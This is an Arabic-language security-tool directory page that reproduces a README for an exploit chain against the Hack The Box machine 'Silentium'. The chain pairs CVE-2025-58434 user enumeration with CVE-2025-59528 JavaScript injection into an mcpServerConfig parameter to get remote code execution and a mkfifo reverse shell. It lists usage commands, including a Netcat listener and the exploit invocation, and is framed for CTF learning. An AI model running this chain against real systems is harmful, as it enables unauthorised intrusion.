Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-58434-59528-htb-ctf — استغلال Silentium HTB-CTF | Kitploit
أدوات/GitHubGitHub/jwsly12/cve-2025-58434-59528-htb-ctf
توليد الحمولةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubjwsly12/cve-2025-58434-59528-htb-ctf

CVE-2025-58434-59528-htb-ctf

استغلال Silentium HTB-CTF

عرض المستودع
2منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-58434-59528-htb-ctf

سلسلة استغلال Silentium

يحتوي هذا المستودع على سلسلة الاستغلال الكاملة لجهاز Silentium على منصة Hack The Box. يعتمد الاستغلال على ثغرة ذات مرحلتين تتضمن تعداد المستخدمين وحقن JavaScript لتحقيق تنفيذ الأوامر عن بُعد (RCE).

📝 الوصف

تتكون سلسلة الثغرات من خلل في كشف المعلومات وحقن أكواد حرج. من خلال تعداد المستخدمين الصالحين أولاً عبر ثغرة إعادة تعيين كلمة المرور، نكتسب السياق اللازم لاستهداف نقطة النهاية customMCP. يتم تحقيق RCE عن طريق حقن دالة JavaScript خبيثة في معامل mcpServerConfig، والتي يتم تنفيذها بواسطة النهاية الخلفية Node.js.

🛠️ الميزات

  • تعداد المستخدمين: يعمل على أتمتة اكتشاف رسائل البريد الإلكتروني الصالحة للنظام باستخدام قائمة كلمات.
  • حقن JavaScript: يستفيد من دالة IIFE (تعبير دالة فوري الاستدعاء) لتجاوز التعقيم.
  • صدفة عكسية عبر TCP: يُنشئ صدفة مستقرة باستخدام أنبوب mkfifo.
  • أتمتة الحمولة: يتولى تلقائيًا جميع عمليات تهريب JSON ومصادقة Bearer Token.

🚀 المتطلبات

يجب أن يكون لديك Python 3 و Bash مثبتين، بالإضافة إلى المكتبة التالية:

pip install requests

💻 الاستخدام

1. تعداد المستخدمين

شغّل سكربت التعداد (Bash) للعثور على الحسابات الصالحة (يتطلب ملف users.txt):

python3 CVE-2025-58434.py

2. بدء تشغيل المستمع

على جهازك المحلي، ابدأ مستمع Netcat:

nc -lvnp 4444

3. تشغيل الاستغلال

نفّذ سكربت Python مع توفير الهدف وعنوان IP الخاص بك ومفتاح API الذي تم الحصول عليه:

python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444

⚙️ الوسائط

⚠️ إخلاء المسؤولية

هذا السكربت مخصص للأغراض التعليمية ولاختبار الاختراق المصرح به داخل بيئات CTF فقط. يُعد الوصول إلى الأهداف أو مهاجمتها دون الحصول على إذن مسبق أمرًا غير قانوني.


التحدي: Silentium (Hack The Box)
ثغرات CVE: CVE-2025-58434 | CVE-2025-59528

تنزيل الأداة
الوسيطالوصفمطلوب
-t, --targetالمضيف الهدفنعم
-k, --keyرمز API Bearerنعم
-l, --lhostعنوان IP للمستمع الخاص بك (VPN)نعم
-p, --lportمنفذ المستمع الخاص بكنعم